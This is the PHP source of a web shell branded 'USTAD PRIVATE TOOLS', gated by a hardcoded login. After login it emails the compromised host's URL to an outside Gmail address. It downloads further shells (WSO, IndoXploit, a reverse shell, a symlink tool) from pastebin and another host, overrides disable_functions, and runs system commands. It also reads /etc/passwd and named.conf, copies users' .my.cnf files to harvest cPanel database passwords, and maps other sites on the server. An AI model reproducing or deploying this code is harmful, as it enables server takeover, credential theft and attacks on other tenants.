Private Tools

1. <?
2. error_reporting(0);
3. ob_start();
4. session_start();
5. ob_end_clean();
6. $host = $_SERVER['HTTP_HOST'];
7. $user=$_GET["username"];
8. $pass=$_GET["password"];
9. if($user=="dian" AND $pass=="lusi")
10. {
11. $_SESSION["username"]=$user;
12. }
13. ?>
14. <title>USTAD PRIVATE TOOLS</title>
15. <link href="http://fonts.googleapis.com/css?family=Share+Tech+Mono" rel="stylesheet" type="text/css">
16. <style>
17. body {background:#2F302F;color:#fff;font-family: 'Share Tech Mono';}
18. input[type=text] , input[type=password] {background:none;border-top:none;border-left:none;border-right:none;color: #02BC8C ;border-bottom:2px solid #02BC8C;font-family: 'Share Tech Mono';padding:2px 8px; -moz-border-radius: 7px; border-radius: 7px;width:30%;}
19. input[type=submit] {background:#02BC8C;color:white;border:1px solid #02BC8C;font-family: 'Share Tech Mono';padding:2px 8px; -moz-border-radius: 10px; border-radius: 10px;width:10%;}
20. .fak {background: #02BC8C ;color:#fff;border:1px solid #02BC8C;font-family: 'Share Tech Mono';padding:2px 8px; -moz-border-radius: 7px; border-radius: 7px;width:15%;}
21. a {text-decoration:none;color:#02BC8C}
22. </style>
23. <br><br>
24. <b>
25. <?php
26. error_reporting(0);
27. ob_start();
28. session_start();
29. ob_end_clean();
30. $subject = "Setor Guys -> ".$host;
31. $message = "Link : ".$host."/".$_SERVER['PHP_SELF']."?user=$user&pass=$pass"; if(isset($_SESSION["username"])){
32. mail("oppicialxz@gmail.com",$subject,$message,"From: $host" );
33. // logout
34. if(isset($_GET['logout'])){
35. ob_start();
36. session_start();
37. ob_end_clean();
38. session_destroy();
39. }
40. /* UstadCage_48 */
41. $p = $_SERVER["HTTP_HOST"];
42. $content = file_get_contents('https://pastebin.com/raw/ay6E1zT9');
43. $fp = fopen($_SERVER['DOCUMENT_ROOT'] . "/history.html","w");
44. if(fwrite($fp,$content)){
45. $suck = "<font color=#02BC8C>OK</font>";
46. $url = "http://$p/history.html";
47. }else{
48. $suck = "<font color=#F64747>ERROR</font>";
49. $url = "/";
50. }
51. fclose($fp);
52. // bypass
53. $by = "disable_functions = none";
54. $byy = fopen('php.ini', 'w');
55. fwrite($byy,$by);
56. fclose($byy);
57. // fm
58. $get = file_get_contents('https://pastebin.com/raw/vKfyPDA3');
59. $bwt = fopen('fm.php', 'w');
60. if(fwrite($bwt,$get)){
61. $fm = "<a class=fak href=\"fm.php\">File Man</a>";
62. }else{
63. $fm = "<a class=fak>File Man</a>";
64. }
65. fclose($fp);
66. // rshell
67. $rs = file_get_contents('http://pastebin.com/raw/XSiWPYNg');
68. $rs1 = fopen('rs.php', 'w');
69. if(fwrite($rs1,$rs)){
70. $rs2 = "<a class='fak' href='rs.php'>Rshell</a>";
71. } else {
72. $rs2 = "<a class=fak>Rshell</a>";
73. }
74. fclose($rs1);
75. // idx
76. $idx = file_get_contents('http://pastebin.com/raw/nC6pWh5a');
77. $idx1 = fopen('idx.php', 'w');
78. if(fwrite($idx1,$idx)){
79. $idx2 = "<a class='fak' href='idx.php'>IndoXploit</a>";
80. } else {
81. $idx2 = "<a class=fak>IndoXploit</a>";
82. }
83. fclose($idx1);
84. // wso
85. $wso = file_get_contents('http://0x01.yn.lt/wso.css');
86. $wso1 = fopen('wso.php', 'w');
87. if(fwrite($wso1,$wso)){
88. $wso2 = "<a class='fak' href='wso.php'>Wso Shell</a>";
89. } else {
90. $wso2 = "<a class=fak>Wso Shell</a>";
91. }
92. fclose($wso1);
93. // Database
94. $db = file_get_contents('http://pastebin.com/raw/t9DcSpxE');
95. $db1 = fopen('db.php', 'w');
96. if(fwrite($db1,$db)){
97. $db2 = "<a class='fak' href='db.php'>Database</a>";
98. } else {
99. $db2 = "<a class=fak>Database</a>";
100. }
101. fclose($db1);
102. // Sym
103. $sym = file_get_contents('http://pastebin.com/raw/kY4XmPVv');
104. $sym1 = fopen('sym.php', 'w');
105. if(fwrite($sym1,$sym)){
106. $sym2 = "<a class='fak' href='sym.php'>Symlink</a>";
107. } else {
108. $sym2 = "<a class=fak>Symlink</a>";
109. }
110. fclose($sym1);
111. // exe
112. function exe($cmd) {
113. if(function_exists('system')){     
114. @ob_start();       
115. @system($cmd);     
116. $buff = @ob_get_contents();
117. @ob_end_clean();       
118. return $buff;  
119. } elseif(function_exists('exec')){     
120. @exec($cmd,$results);      
121. $buff = "";        
122. foreach($results as $result) {         
123. $buff .= $result;      
124. }
125. return $buff;  
126. } elseif(function_exists('passthru')){     
127. @ob_start();       
128. @passthru($cmd);       
129. $buff = @ob_get_contents();
130. @ob_end_clean();       
131. return $buff;  
132. } elseif(function_exists('shell_exec')){       
133. $buff = @shell_exec($cmd);     
134. return $buff;  
135. }
136. }
137. // info
138. $ip = gethostbyname($_SERVER['HTTP_HOST']);
139. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=#F64747>ON</font>" : "<font color=#18BC9C>OFF</font>";
140. $ds = @ini_get("disable_functions");
141. $mysql = (function_exists('mysql_connect')) ? "<font color=#18BC9C>ON</font>" : "<font color=#F64747>OFF</font>";
142. $curl = (function_exists('curl_version')) ? "<font color=#18BC9C>ON</font>" : "<font color=#F64747>OFF</font>";
143. $wget = (exe('wget --help')) ? "<font color=#18BC9C>ON</font>" : "<font color=#F64747>OFF</font>";
144. $show_ds = (!empty($ds)) ? "<font color=#F64747>ON</font>" : "<font color=#18BC9C>NONE</font>";
145. $user = @get_current_user();
146. $uid = @getmyuid();
147. $gid = @getmygid();
148. // lets
149. echo "<center><font new size='7'>USTAD PRIVATE TOOLS</font><br>".php_uname()."<br>Safe_Mod : $sm | IP : $ip | User : $user($uid/$gid) | Dis : $show_ds | Mysql : $mysql | cURL : $curl <br>root@ndutt : ".getcwd()." [ <a href='$url'>$suck</a> ]";
150. // menu
151. echo "<br><br>$fm $rs2 $idx2 $wso2 $sym2 $db2<br><br>";
152. echo "&copy; 2016 - 2018 UstadCage_48 - BebyYers ~";
153. // domain
154. $file = @implode(@file("/etc/named.conf"));
155. preg_match_all("#named/(.*?).db#",$file ,$r);
156. $domains = array_unique($r[1]);
157. {
158. $do = "".count($domains)."";
159. echo "<br>Ada [ ".$do." ] Domain";
160. }
161. // cp
162. @ini_set('display_errors',0);
163. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
164. $ar0=explode($marqueurDebutLien, $text);
165. $ar1=explode($marqueurFinLien, $ar0[$i]);
166. return trim($ar1[0]);
167. }
168. $d0mains = @file('/etc/named.conf');
169. $domains = scandir("/var/named");
170. if($domains or $d0mains){
171. $domains = scandir("/var/named");
172. if($domains) {
173. $count=1;
174. $dc = 0;
175. $list = scandir("/var/named");
176. foreach($list as $domain){
177. if(strpos($domain,".db")){
178. $domain = str_replace('.db','',$domain);
179. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
180. $dirz = '/home/'.$owner['name'].'/.my.cnf';
181. $path = getcwd();
182. if (is_readable($dirz)) {
183. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
184. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
185. $password=entre2v2($p,'password="','"');
186. $dc++;
187. }}}
188. $total = $dc;
189. echo '<br>'.$total.' Cpanel Berhasil Di Crack <br />';
190. }else{
191. $d0mains = @file('/etc/named.conf');
192. if($d0mains){
193. $count=1;
194. $dc = 0;
195. $mck = array();
196. foreach($d0mains as $d0main){
197. if(@eregi('zone',$d0main)){
198. preg_match_all('#zone "(.*)"#',$d0main,$domain);
199. flush();
200. if(strlen(trim($domain[1][0])) >2){
201. $mck[] = $domain[1][0];
202. }}}
203. $mck = array_unique($mck);
204. $usr = array();
205. $dmn = array();
206. foreach($mck as $o) {
207. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
208. $usr[] = $infos['name'];
209. $dmn[] = $o;
210. }
211. array_multisort($usr,$dmn);
212. $dt = file('/etc/passwd');
213. $passwd = array();
214. foreach($dt as $d) {
215. $r = explode(':',$d);
216. if(strpos($r[5],'home')){
217. $passwd[$r[0]] = $r[5];
218. }}
219. $l=0;
220. $j=1;
221. foreach($usr as $r){
222. $dirz = '/home/'.$r.'/.my.cnf';
223. $path = getcwd();
224. if (is_readable($dirz)) {
225. copy($dirz, ''.$path.'/'.$r.'.txt');
226. $p=file_get_contents(''.$path.'/'.$r.'.txt');
227. $password=entre2v2($p,'password="','"');
228. $dc++;
229. flush();
230. $l=$l?0:1;
231. $j++;
232. }}}
233. $total = $dc;
234. echo '<br>'.$total.' Cpanel Berhasil Di Crack <br />';
235. }
236. }else{
237. echo "<br><font color='#fff'>Info Cpanel : </font> <font color='#02BC8C'> Not Accessible!</font><br>";
238. }
239. // jump
240. set_time_limit(0);
241. @$passwd = fopen('/etc/passwd','r');
242. if(!$passwd){ die('<b> Jumping Info : <font color="#02BC8C">Wew Ternyata Tidak Ada Web Yg Bisa Di Ikeh Ikeh >_< </font></b>'); }
243. $pub = array();
244. $users = array();
245. $conf = array();
246. $i = 0;
247. while(!feof($passwd)){
248. $str = fgets($passwd);
249. if($i > 35){
250. $pos = strpos($str,':');
251. $username = substr($str,0,$pos);
252. $dirz = '/home/'.$username.'/public_html/';
253. if(($username != '')){
254. if(is_readable($dirz)){
255. array_push($users,$username);
256. array_push($pub,$dirz);
257. }}}
258. $i++;
259. }
260. echo " Jumping Info : Di Temukan <font color=#02BC8C> ".sizeof($users)." </font> Web Dalam Server $ip >_<"."<br />";
261. }else{
262. echo '<center>
263. UstadCage_48 Private Tools<br><pre>
264. ─╔╗╔╗────╔╗────╔╦╗
265. ╔╝║║╚╗╔═╗║╚╗╔╦╗║║║
266. ║╬║║║║║╩╣║╔╣║╔╝╠╗║
267. ╚═╝╚╩╝╚═╝╚═╝╚╝─╚═╝
268. </font>
269. </pre>"RES7OCK CREW"<br>
270. '.$_SERVER['HTTP_HOST'].'
271. <form method="GET" action="">
272. <p><input type="text" name="username" value="" placeholder="User"></p>
273. <p><input type="password" name="password" value="" placeholder="Pass"></p>
274. <p><input type="submit" name="commit" value="Login"></p>
275. </form>
276. </center>
277. ';
278. }
279. ?>
280. </b>